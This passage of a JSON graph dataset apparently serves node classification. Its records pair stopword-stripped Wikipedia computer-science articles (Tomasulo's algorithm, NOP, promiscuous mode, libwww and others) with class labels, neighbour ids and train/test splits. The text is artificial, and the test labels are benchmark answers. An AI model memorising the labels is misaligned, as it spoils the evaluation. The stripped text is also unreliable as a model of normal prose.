phrase 1970s apl like beautiful diamond – flawless beautifully symmetrical ca n't add anything try glue another diamond n't get bigger diamond lisp like ball mud add still ball mud – still looks like lisp moses strongly denies claiming instead called lisp bean bag always returns original shape",
    "neighbors": [
      2519,
      10211,
      6502,
      7189,
      11255
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10779,
    "label": 3,
    "text": "Tomasulo_algorithm:tomasulo algorithm tomasulo ’ algorithm computer architecture hardware algorithm dynamic scheduling instructions allows out-of-order execution enables efficient use multiple execution units developed robert tomasulo ibm 1967 first implemented ibm system/360 model 91 ’ floating point unit major innovations tomasulo ’ algorithm include register renaming hardware reservation stations execution units common data bus cdb computed values broadcast reservation stations may need developments allow improved parallel execution instructions would otherwise stall use scoreboarding earlier algorithms robert tomasulo received eckert–mauchly award 1997 work algorithm following concepts necessary implementation tomasulo algorithm common data bus cdb connects reservation stations directly functional units according tomasulo preserves precedence encouraging concurrency two important effects instructions issued sequentially effects sequence instructions exceptions raised instructions occur order would in-order processor regardless fact executed out-of-order i.e non-sequentially tomasulo algorithm uses register renaming correctly perform out-of-order execution general-purpose reservation station registers hold either real value placeholder value real value unavailable destination register issue stage placeholder value initially used placeholder value tag indicating reservation station produce real value unit finishes broadcasts result cdb placeholder replaced real value functional unit single reservation station reservation stations hold information needed execute single instruction including operation operands functional unit begins processing free source operands needed instruction real practically speaking may exceptions enough status information exception available case processor may raise special exception called imprecise exception imprecise exceptions occur non-oooe implementations processor state changed program order see risc pipeline exceptions programs experience precise exceptions specific instruction took exception determined restart re-execute point exception however experience imprecise exceptions generally restart re-execute system determine specific instruction took exception three stages listed stages instruction passes time issued time execution complete issue stage instructions issued execution operands reservation stations ready else stalled registers renamed step eliminating war waw hazards execute stage instruction operations carried instructions delayed step operands available eliminating raw hazards program correctness maintained effective address calculation prevent hazards memory write result stage alu operations results written back registers store operations written back memory concepts reservation stations register renaming common data bus tomasulo algorithm presents significant advancements design high-performance computers reservation stations take responsibility waiting operands presence data dependencies inconsistencies varying storage access time circuit speeds thus freeing functional units improvement overcomes long floating point delays memory accesses particular algorithm tolerant cache misses additionally programmers freed implementing optimized code result common data bus reservation station working together preserve dependencies well encouraging concurrency tracking operands instructions reservation stations register renaming hardware algorithm minimizes read-after-write raw eliminates write-after-write waw write-after-read war computer architecture hazards improves performance reducing wasted time would otherwise required stalls equally important improvement algorithm design limited specific pipeline structure improvement allows algorithm widely adopted multiple-issue processors additionally algorithm easily extended enable branch speculation tomasulo algorithm outside ibm unused several years implementation system/360 model 91 architecture however saw vast increase usage 1990s 3 reasons many modern processors implement dynamic scheduling schemes derivative tomasulo ’ original algorithm including popular intel x86-64 chips",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      1798,
      6926,
      6415,
      1298,
      6950,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      7598,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 10780,
    "label": 2,
    "text": "List_of_Linux_adopters:list linux adopters linux adopters organizations individuals moved operating systems linux local governments come pressure institutions world trade organization international intellectual property alliance turned linux free software affordable legal alternative pirated software expensive proprietary computer products microsoft apple commercial companies spread linux affords leverage countries companies developed world bid government contracts since low-cost option exists furnishing alternative path development countries like india pakistan many citizens skilled computer applications afford technological investment first world prices cost factor one considered though – many governmental institutions public military sectors north america european union make transition linux due superior stability openness source code turn leverages information security linux often used technical disciplines universities research centres due several factors including linux available free charge includes large body free/open-source software extent technical competence computer science software engineering academics also contributor stability maintainability upgradability ibm ran advertising campaign entitled linux education featuring young boy supposed linux examples large scale adoption linux education include following linux used extensively servers businesses long time linux also used corporate environments desktop platform employees commercially available solutions including red hat enterprise linux suse linux enterprise desktop ubuntu",
    "neighbors": [
      2560,
      4616,
      3082,
      5644,
      5139,
      9237,
      8727,
      4637,
      10785,
      3618,
      6180,
      9257,
      1584,
      5681,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      10316,
      593,
      2134,
      5721,
      3162,
      3677,
      2658,
      6244,
      5222,
      10856,
      6763,
      4207,
      9851,
      5244,
      4734,
      11391,
      7812,
      8326,
      9353,
      7821,
      4238,
      10382,
      657,
      2195,
      2711,
      6808,
      10392,
      9882,
      6301,
      1694,
      2723,
      8364,
      10933,
      5822,
      5824,
      4803,
      1736,
      2762,
      6352,
      3289,
      3802,
      4831,
      8928,
      1761,
      10464,
      2278,
      233,
      4841,
      7403,
      8937,
      9455,
      7920,
      9970,
      10482,
      8439,
      2809,
      3323,
      6909,
      7938,
      4360,
      1291,
      4367,
      8976,
      1813,
      792,
      5410,
      295,
      1833,
      815,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      3911,
      6988,
      10063,
      4437,
      11095,
      3422,
      863,
      865,
      2914,
      8554,
      10091,
      6508,
      7020,
      1394,
      1396,
      1400,
      8573,
      1406,
      3458,
      7555,
      900,
      8066,
      11654,
      4493,
      10127,
      11155,
      9621,
      1431,
      8602,
      926,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      10687,
      9667,
      4039,
      1480,
      457,
      4040,
      5067,
      10192,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      2021,
      9190,
      11232,
      1513,
      4073,
      10732,
      3055,
      5105,
      8177,
      499,
      1524,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 10781,
    "label": 3,
    "text": "Hazard_(computer_architecture):hazard computer architecture domain central processing unit cpu design hazards problems instruction pipeline cpu microarchitectures next instruction execute following clock cycle potentially lead incorrect computation results three common types hazards data hazards structural hazards control hazards branching hazards several methods used deal hazards including pipeline stalls/pipeline bubbling operand forwarding case out-of-order execution scoreboarding method tomasulo algorithm instructions pipelined processor performed several stages given time several instructions processed various stages pipeline fetch execute many different instruction pipeline microarchitectures instructions may executed out-of-order hazard occurs two simultaneous possibly order instructions conflict data hazards occur instructions exhibit data dependence modify data different stages pipeline ignoring potential data hazards result race conditions also termed race hazards three situations data hazard occur consider two instructions occurring program order read write raw data hazard refers situation instruction refers result yet calculated retrieved occur even though instruction executed prior instruction prior instruction processed partly pipeline example first instruction calculating value saved register second going use value compute result register however pipeline operands fetched 2nd operation results first yet saved hence data dependency occurs data dependency occurs instruction dependent completion instruction write read war data hazard represents problem concurrent execution example situation chance may finish i.e. concurrent execution must ensured result register stored chance fetch operands write write waw data hazard may occur concurrent execution environment example write back wb must delayed finishes executing structural hazard occurs part processor hardware needed two instructions time canonical example single memory unit accessed fetch stage instruction retrieved memory memory stage data written and/or read memory often resolved separating component orthogonal units separate caches bubbling pipeline detected using hazard control unit branching hazards also termed control hazards occur branches many instruction pipeline microarchitectures processor know outcome branch needs insert new instruction pipeline normally fetch stage bubbling pipeline also termed pipeline break pipeline stall method preclude data structural branch hazards instructions fetched control logic determines whether hazard could/will occur true control logic inserts pipeline thus next instruction would cause hazard executes prior one sufficient time finish prevent hazard number equals number stages pipeline processor cleared instructions proceed free hazards forms stalling introduce delay processor resume execution flushing pipeline occurs branch instruction jumps new memory location invalidating prior stages pipeline prior stages cleared allowing pipeline continue new instruction indicated branch several main solutions algorithms used resolve data hazards case out-of-order execution algorithm used task removing data dependencies delegated compiler fill appropriate number instructions dependent instructions ensure correct operation re-order instructions possible example write value 3 register 1 already contains 6 add 7 register 1 store result register 2 i.e following execution register 2 contain value 10 however i1 write 3 register 1 fully exit pipeline i2 starts executing means r1 contain value 3 i2 performs addition event i2 adds 7 old value register 1 6 register 2 contains 13 instead i.e error occurs i2 reads register 1 i1 committed/stored result write operation register 1 i2 reading contents register 1 register 1 still contains 6 3 forwarding described helps correct errors depending fact output i1 3 used subsequent instructions value 3 committed to/stored register 1 forwarding applied example means wait commit/store output i1 register 1 example output 3 making output available subsequent instruction case i2 effect i2 uses correct recent value register 1 commit/store made immediately pipelined forwarding enabled instruction decode/execution id/ex stage pipeline two inputs value read register specified example value 6 register 1 new value register 1 example value 3 sent next stage instruction execute/memory access ex/mem added control logic used determine input use avoid control hazards microarchitectures event branch causes pipeline bubble incorrect instructions entered pipeline care must taken prevent wrongly-loaded instructions effect processor state excluding energy wasted processing discovered loaded incorrectly memory latency another factor designers must attend delay could reduce performance different types memory different accessing time memory thus choosing suitable type memory designers improve performance pipelined data path",
    "neighbors": [
      7173,
      9224,
      9739,
      2066,
      7699,
      5655,
      10779,
      10786,
      6181,
      8231,
      6184,
      10796,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      604,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      3226,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      9003,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3451,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      936,
      10669,
      7598,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Train"
  },
  {
    "node_id": 10782,
    "label": 7,
    "text": "Visual_Cloud:visual cloud visual cloud implementation visual computing applications rely cloud computing architectures cloud scale processing storage ubiquitous broadband connectivity connected devices network edge devices cloud data centers model providing visual computing services consumers business users allowing service providers realize general benefits cloud computing low cost elastic scalability high availability providing optimized infrastructure visual computing application requirements rise cloud computing enabled convergence powerful low-cost computer hardware high-capacity networks advances hardware virtualization satisfy high consumer demand visually-based entertainment video gaming well online social interaction service providers began deploy visually oriented applications centralized data centers use distributed content delivery networks make content accessible users mobile consumption video content particular makes cloud delivery video attractive remote processing storage compensate limitations mobile devices much 75 world ’ mobile data traffic expected video 2020 first generation visual cloud technologies mostly oriented around streaming media applications mid-2000s saw introduction professional user generated video-on-demand services like netflix youtube multiplayer online games mogs like call duty massively multiplayer online games mmogs like world warcraft another common usage visual cloud emerged timeframe desktop virtualization based remote desktop instances hosted using cloud infrastructure visual cloud technology become capable demanding usages begun emerge use visual cloud virtual reality augmented reality 3d scene understanding interactivity immersive live experiences visual cloud applications roughly divided four primary domains overall amount video delivered throughout world increasing significantly new sources develop processing distribution content may increasingly addressed means visual cloud sources content include applications cloud communications media/entertainment enterprise environments global mobile data traffic forecast increase nearly 7x 2016 2021 three primary models content distribution compute-intensive visual workloads media content creation delivery segment include media processing e.g. compression transcoding enhancement restoration compositing content stored data centers ultimately transmitted end-users workloads many others may applied content factors bit rate resolution tailored match transmission medium capabilities end-consumer device interactive 3d e.g. virtual desktop infrastructure batch rendering e.g. renderman operations may performed scale visual cloud usages user remote site rendering operations example usages domain include following varying requirements scale performance density among workloads implications cloud resources optimally support example visual cloud infrastructure support remote desktops would likely configured goal supporting greatest practical number desktop instances per server cloud game streaming hand requires far greater attention meeting peak graphics performance likely requiring lower density per server interactive usages also highly latency sensitive remote batch rendering values time completion latency playing far less important role computations based media visual cloud used manipulate provide deeper understanding media content well provide insights based users interact media analytics treats visual information unstructured data processed fed analytics engines interpretation images audio video implement usages web visual search autonomous transportation surveillance smart cities robotics visual computing technologies media analytics segment include three subdomains media analytics often makes use “ deep learning ” frameworks involve training algorithm using large amounts source data training portion approach typically takes place extended period time involves teaching algorithm mapping large amounts input data specific output classifications resulting trained algorithm make rapid instantaneous interpretations new input data based rules developed training stage making use capabilities three usage areas described i.e. media content creation delivery cloud graphics media analytics visual data manipulated based contents support emerging usages live panoramic video augmented virtual reality vr immersive reality gaming example builds game experience top physical surroundings player real time experiences consumed purpose-built displays vr head-mounted displays conventional devices pcs tablets phones visible usages technologies include google street view pokémon go commercially available examples immersive media include voke vr live streaming freed virtual replay technology facebook 360° photos oculus rift microsoft hololens vr goggles usages immersive media segment require compute-intensive scene analysis must often performed real time near-real time visual cloud applications workloads distributed end devices cloud example head-mounted display rendering might done locally user minimize latency live vr content distribution could done predominantly cloud",
    "neighbors": [
      2720,
      10368,
      4194,
      9508,
      6153,
      3123,
      5371,
      10270
    ],
    "mask": "None"
  },
  {
    "node_id": 10783,
    "label": 2,
    "text": "Object_resurrection:object resurrection object-oriented programming languages garbage collection object resurrection object comes back life process object destruction side effect finalizer executed object resurrection causes number problems particularly possibility object resurrection – even occur – makes garbage collection significantly complicated slower major reason finalizers discouraged languages deal object resurrection various ways solutions problems rare circumstances object resurrection used implement certain design patterns notably object pool circumstances resurrection undesired bug caused error finalizers general resurrection discouraged object resurrection occurs via following process first object becomes garbage longer reachable program may collected destroyed deallocated object destruction garbage collector deallocates object finalizer method may run may turn make object another garbage object reachable object finalizer reachable creating references finalizer may contain arbitrary code happens referenced object – necessarily finalized object – longer garbage deallocated otherwise references would become dangling references cause errors used generally program crash unpredictable behavior instead order maintain memory safety object returned life resurrected order detect garbage collector generally two-phase collection presence finalizers first finalize garbage finalizer re-check garbage garbage reachable objects finalizers case finalizers resurrected garbage adds overhead delays memory reclamation resurrected object may treated objects may treated specially many languages notably c java python python 3.4 objects finalized avoid possibility object repeatedly resurrected even indestructible c objects finalizers default finalized re-registered finalization cases resurrected objects considered errors notably objective-c treated identically objects notably python prior python 3.4 resurrected object sometimes called zombie term used various object states related object destruction usage depending language author zombie object specialized meaning objective-c however detailed zombie objects somewhat analogous zombie processes undergone termination state change close deallocation details significantly different .net framework notably c vb.net object resurrection instead refers state object finalization object brought back life inaccessible finalizer run returned inaccessible longer registered future finalization .net objects need finalization tracked object-by-object instead stored finalization queue rather notion resurrected objects sense article one speaks objects queued finalization objects re-enqueued finalization via codice_1 taking care multiply enqueue objects two main ways object resurrect another object creating reference object reach garbage reachable garbage reference non-garbage objects creating reference environment global variables cases static variables variables closure python examples follow object resurrecting also possible object resurrect objects collected given garbage collection cycle mechanisms resurrects creating reference object reach resurrects creating reference global environment examples cpython prior 3.4 run finalizers repeatedly objects garbage-collected cpython 3.4 later finalizers called objects garbage-collected second time become unreachable object resurrection causes large number problems languages adopted several different methods coping object resurrection commonly two-phase garbage collection presence finalizers prevent dangling references finalizing objects particularly marking objects finalized via flag ensure objects destroyed java free object proven object unreachable run finalizer python prior python 3.4 standard cpython implementation would treat resurrected objects identically objects never finalized making indestructible objects possible would garbage collect cycles contained object finalizer avoid possible problems object resurrection starting python 3.4 behavior largely java objects finalized marked already finalized garbage collection cycles two phases second phase checking resurrected objects objective-c 2.0 put resurrected objects zombie state log messages sent nothing else see also automatic reference counting zeroing weak references handling weak references .net framework notably c vb.net object finalization determined finalization queue checked object destruction objects finalizer placed queue creation dequeued finalizer called manually dequeued prior finalization codice_3 re-enqueued codice_4 thus default objects finalizers finalized finalization suppressed objects finalized multiple times resurrected made accessible re-enqueued finalization weak references default track resurrection meaning weak reference updated object resurrected called short weak references weak references track resurrection called long weak references object resurrection useful handle object pool commonly used objects obscures code makes confusing used objects may frequently used construction/destruction time-consuming example could array random numbers large number created destroyed short time actually small number use time object resurrection pooling technique would reduce unnecessary overhead creation destruction pool manager would get onto object stack information form reference object currently destructed pool manager keep object reuse later",
    "neighbors": [
      2304,
      1954,
      10470,
      4747,
      1715,
      3573,
      541
    ],
    "mask": "Test"
  },
  {
    "node_id": 10784,
    "label": 3,
    "text": "Ricoh_2A03:ricoh 2a03 ricoh 2a03 rp2a03 ntsc version ricoh 2a07 rp2a07 pal version 8-bit microprocessor manufactured ricoh nintendo entertainment system video game console contained second sourced mos technology 6502 core modified disable 6502 binary-coded decimal mode 22 memory-mapped i/o registers controlled apu rudimentary dma game controller polling also used sound chip secondary cpu nintendo arcade games punch-out donkey kong 3 pal versions nes sold europe asia australia used ricoh 2a07 rp2a07 processor identical 2a03 except different clock divider 50 hz vertical refresh rate used pal television standard exception 16 hard-coded sampling rates delta modulation-encoded sample playback unit changes made order sampled sounds maintain original pitch rp2a03 new clock divider",
    "neighbors": [
      7170,
      11395,
      4751,
      10767,
      659,
      664,
      4385,
      6949,
      7589,
      4136,
      11054,
      2874,
      3010,
      6981,
      2635,
      3157,
      6485,
      4569,
      10969,
      6878,
      5862,
      10351,
      1776,
      5617,
      7281,
      4211,
      7282,
      5237,
      7284
    ],
    "mask": "Test"
  },
  {
    "node_id": 10785,
    "label": 2,
    "text": "Smack_(software):smack software smack full name simplified mandatory access control kernel linux kernel security module protects data process interaction malicious manipulation using set custom mandatory access control mac rules simplicity main design goal officially merged since linux 2.6.25 release main access control mechanism meego mobile operating system also used sandbox html5 web applications tizen architecture commercial wind river linux solutions embedded device development philips digital tv products. intel ostro os iot devices since 2016 smack required automotive grade linux agl implementations provides association linux facilities base agl security framework smack consists three components smack criticized written new lsm module instead selinux security policy provide equivalent functionality selinux policies proposed none demonstrated smack author replied would practical due selinux complicated configuration syntax philosophical difference smack selinux designs",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8438,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      4972,
      7540,
      8573,
      1406,
      8066,
      900,
      2948,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      7663,
      5105,
      2036,
      5620,
      8186,
      2044,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10786,
    "label": 3,
    "text": "NOP_(code):nop code computer science nop no-op noop pronounced op short operation assembly language instruction programming language statement computer protocol command nothing computer instruction sets include instruction whose explicit purpose change state programmer-accessible registers status flags memory often takes well-defined number clock cycles execute instruction sets nop simulated executing instruction operands cause effect e.g sparc processor instruction codice_1 recommended solution nop commonly used timing purposes force memory alignment prevent hazards occupy branch delay slot render void existing instruction jump place-holder replaced active instructions later program development replace removed instructions reorganizing would problematic time-consuming cases nop minor side effects example motorola 68000 series processors nop opcode causes synchronization pipeline listed nop instruction cpu architectures hardware design point view unmapped areas bus often designed return zeroes since nop slide behavior often desirable gives bias coding all-zeroes opcode nop sometimes used description action performed function sequence programming language statements function code effect might also called redundant code common compiler optimization detection removal kind code code may required grammar programming language allow blank ada codice_2 statement serves nop syntax forbids control statements functions empty codice_2 statement must used specify action required thus programmer forgets write sequence statements program fail compile second line example single c statement behaves like nop practice compilers generate code statement statement performs addition discards result indeed statement without side effects affect control flow e.g. break return removed result computation discarded simplest possible statement c behaves like nop so-called null statement semi-colon context requiring statement compiler required generate nop instruction case typically instructions whatsoever would generated alternatively empty block compound statement may used may legible cases body function block must used empty c statements empty – simple statements must end semicolon compound statements enclosed braces need following semicolon thus contexts statement grammatically required null statement used null statement useless syntactic use wider context e.g. within context loop alternatively tersely note last form may confusing generates warning compilers compiler options semicolon usually indicates end function call instruction placed round parenthesis end line code continues calling function getchar returns \\n newline character essentially fast-forwarding current reading location standard input beginning next line fortran codice_4 statement used contexts last statement loop although used anywhere functionality c used used null statement fact due specification language begin end block semicolon optional end statement thus semicolon used superfluous also block consisting codice_5 may used placeholder indicate action even placed inside another begin end block python programming language codice_6 statement effect executed thus serves nop primarily used ensure correct syntax due python indentation-sensitive syntax example syntax definition class requires indented block class logic expressed codice_6 empty jquery library provides function codice_8 nothing angular framework provides angular.noop function performs operations 'codice_9 colon character shell builtin similar effect nop do-nothing operation technically nop changes special parameter exit status last command 0 may considered synonym shell builtin 'true exit status true 0 lodash library provides function codice_10 returns undefined nothing many computer protocols telnet include nop command client issue request response server without requesting actions command used ensure connection still alive server responsive noop command part following protocols partial list note unlike protocols listed imap4 noop command specific purpose allows server send pending notifications client telnet ftp servers respond noop command ok +ok programmers added quirky responses client example codice_11 daemon minix responds noop message nops often involved cracking software checks serial numbers specific hardware software requirements presence absence hardware dongles etc accomplished altering functions subroutines bypass security checks instead simply return expected value checked instructions security check routine unused would replaced nops thus removing software security functionality without attracting attention nop opcode used form nop slide allows code execute exact value instruction pointer indeterminate e.g. buffer overflow causes function return address stack overwritten",
    "neighbors": [
      8450,
      255,
      518,
      8715,
      8716,
      10508,
      11537,
      1298,
      2322,
      3218,
      5651,
      7445,
      8732,
      8861,
      10781,
      7071,
      6818,
      4389,
      7717,
      9639,
      9003,
      428,
      2732,
      10796,
      7471,
      2224,
      4144,
      8501,
      9909,
      7607,
      9911,
      11447,
      2618,
      2620,
      4928,
      7234,
      6596,
      7364,
      8262,
      8523,
      6988,
      8524,
      9932,
      8143,
      7505,
      11604,
      3157,
      7421,
      730,
      477,
      3708,
      6501,
      5862,
      7269,
      10727,
      11112,
      8554,
      9964,
      5358,
      1776,
      7281,
      7282,
      499,
      372,
      8700,
      1399,
      3960,
      1915,
      2556,
      2045,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 10787,
    "label": 5,
    "text": "ESobi:esobi esobi integrated desktop-based information management tool standalone news aggregator delivered worldwide acer computers esobi shareware application full version esobi consists four functions 1 rss reader 2 podcast receiver 3 meta-search engine 4 data library esobi supports 32-bit 64-bit windows 7 windows vista well windows xp esobi first developed esobi inc. taipei taiwan 2006 windows computers started first market combine rss reader meta-search engine scrapbook one application aiming ease information overload web recent updates september 2009 added podcast receiver features new ui design since 2008 acer bundled simpler version esobi computers including popular netbook acer aspire one version esobi includes rss reader data library free purchase acer computers esobi also software partner transcend information inc. 90-day trial version delivered selected transcend jetflash usb flash drives esobi windows mobile android platforms also available esobi received cnet download.com 5-star editor ’ review softpedia 4-star “ good ” editor ’ review 2009",
    "neighbors": [
      106,
      6797,
      7983,
      5681,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 10788,
    "label": 4,
    "text": "Promiscuous_mode:promiscuous mode computer networking promiscuous mode mode wired network interface controller nic wireless network interface controller wnic causes controller pass traffic receives central processing unit cpu rather passing frames controller specifically programmed receive mode normally used packet sniffing takes place router computer connected wired network one part wireless lan interfaces placed promiscuous mode software bridges often used hardware virtualization ieee 802 networks ethernet ieee 802.11 frame includes destination mac address non-promiscuous mode nic receives frame drops unless frame addressed nic mac address broadcast multicast addressed frame promiscuous mode however nic allows frames thus allowing computer read frames intended machines network devices many operating systems require superuser privileges enable promiscuous mode non-routing node promiscuous mode generally monitor traffic nodes within broadcast domain ethernet ieee 802.11 ring token ring computers attached ethernet hub satisfy requirement network switches used combat malicious use promiscuous mode router may monitor traffic routes promiscuous mode often used diagnose network connectivity issues programs make use feature show user data transferred network protocols like ftp telnet transfer data passwords clear text without encryption network scanners see data therefore computer users encouraged stay away insecure protocols like telnet use secure ones ssh promiscuous mode used malicious way capture private data transit network computer security professionals might interested detecting network devices promiscuous mode promiscuous mode software might send responses frames even though addressed another machine however experienced sniffers prevent e.g. using carefully designed firewall settings example sending ping icmp echo request wrong mac address right ip address adapter operating normal mode drop frame ip stack never sees responds adapter promiscuous mode frame passed ip stack machine mac address meaning respond would ping sniffer prevent configuring firewall block icmp traffic following applications applications classes use promiscuous mode",
    "neighbors": [
      7426,
      6153,
      1941,
      3486,
      1580,
      7983,
      9142,
      8121,
      700,
      7364,
      842,
      7502,
      10705,
      9939,
      2006,
      8922,
      6624,
      9440,
      4580,
      10341,
      10343,
      11112,
      10346,
      10349,
      1776,
      7411,
      2292,
      4085,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10789,
    "label": 3,
    "text": "OpenSPARC:opensparc opensparc open-source hardware project started december 2005 initial contribution project sun microsystems register-transfer level rtl verilog code full 64-bit 32-thread microprocessor ultrasparc t1 processor march 21 2006 sun released source code t1 ip core gnu general public license v2 full opensparc t1 system consists 8 cores one capable executing four threads concurrently total 32 threads core executes instruction order logic split among 6 pipeline stages december 11 2007 sun also made ultrasparc t2 processor rtl available via opensparc project also released gnu general public license v2 opensparc t2 8 cores 16 pipelines 64 threads",
    "neighbors": [
      3328,
      9090,
      9731,
      1801,
      4235,
      1809,
      2710,
      8863,
      7072,
      9343,
      8994,
      1316,
      1707,
      5677,
      3886,
      3247,
      6322,
      10675,
      2871,
      6716,
      8508,
      7104,
      9665,
      6338,
      6979,
      10436,
      8007,
      1480,
      2895,
      597,
      3285,
      10327,
      10200,
      5471,
      1376,
      4960,
      9955,
      11363,
      10984,
      11626,
      7148,
      7022,
      5872,
      5233,
      8179,
      10483,
      9333,
      11125,
      631,
      11129,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10790,
    "label": 4,
    "text": "NuFW:nufw nufw software package extends netfilter linux kernel-internal packet filtering firewall module nufw adds authentication filtering rules nufw also provided hardware firewall edenwall firewalling appliance nufw restarted ffi renamed ufwi nufw ufwi extension netfilter brings notion user ip filtering nufw ufwi nufw ufwi refuses idea ip == user ip address easily spoofed thus uses algorithm perform authentication depends two subsystems nufw connected netfilter nuauth connected clients nufw algorithm following algorithm realizes posteriori authentication connection time-based association ensures identity user sent packet nufw real authentication firewall never associates user machine",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      6559,
      10531,
      5924,
      550,
      8998,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      5433,
      11577,
      9279,
      5057,
      1858,
      4163,
      10433,
      11073,
      2118,
      5451,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10791,
    "label": 8,
    "text": "Libwww:libwww libwww library world wide web modular client-side web api unix windows also name reference implementation libwww api used applications varying sizes including web browsers editors internet bots batch tools pluggable modules provided libwww add support http/1.1 caching pipelining post digest authentication deflate purpose libwww serve testbed protocol experiments software developers reinvent wheel libcurl considered modern replacement libwww 1991 1992 tim berners-lee student cern named jean-françois groff rewrote various components original worldwideweb browser nextstep operating system portable c code order demonstrate potential world wide web beginning libwww referred common library available separate product becoming generally available libwww integrated cern program library cernlib july 1992 library ported decnet may 1993 world wide web newsletter berners-lee announced common library called libwww licensed public domain encourage development web browsers initially considered releasing software gnu general public license rather public domain decided due concerns large corporations ibm would deterred using restrictions gpl rapid early development library caused robert cailliau problems integrating macwww browser 25 november 1994 version 2.17 henrik frystyk nielsen responsible libwww 21 march 1995 release version 3.0 cern put full responsibility libwww world wide web consortium w3c 1995 onwards line mode browser longer released separately part libwww package w3c created arena web browser testbed testing tool html3 css png features like libwww beta 3 arena replaced amaya 2 september 2003 w3c stopped development library due lack resources expectation development would come open source community libwww supports following protocols features include libwww supports plug-ins 19 applications used libwww integrated applications libwww developers libcurl criticised libwww portable thread-safe lacking several http authentication types neither libcurl libwww lightweight enough projects",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      9770,
      559,
      4661,
      3639,
      10808,
      64,
      5707,
      8268,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      113,
      115,
      9843,
      4213,
      6775,
      3191,
      4728,
      119,
      124,
      637,
      1664,
      6797,
      3218,
      10910,
      8351,
      4768,
      7340,
      10413,
      9908,
      11449,
      4797,
      7364,
      11466,
      7885,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      2804,
      10486,
      2296,
      3323,
      8443,
      7943,
      1807,
      5907,
      3350,
      5399,
      7965,
      7455,
      1834,
      7983,
      10033,
      823,
      10057,
      10060,
      8013,
      3412,
      11112,
      8557,
      7022,
      10611,
      5492,
      3961,
      6528,
      11650,
      3971,
      3462,
      8070,
      8584,
      6028,
      7572,
      5026,
      5054,
      10174,
      4048,
      4561,
      5078,
      479,
      10722,
      5605,
      6629,
      487,
      8169,
      494,
      7152,
      1520,
      4592,
      6133,
      502,
      5114,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10792,
    "label": 7,
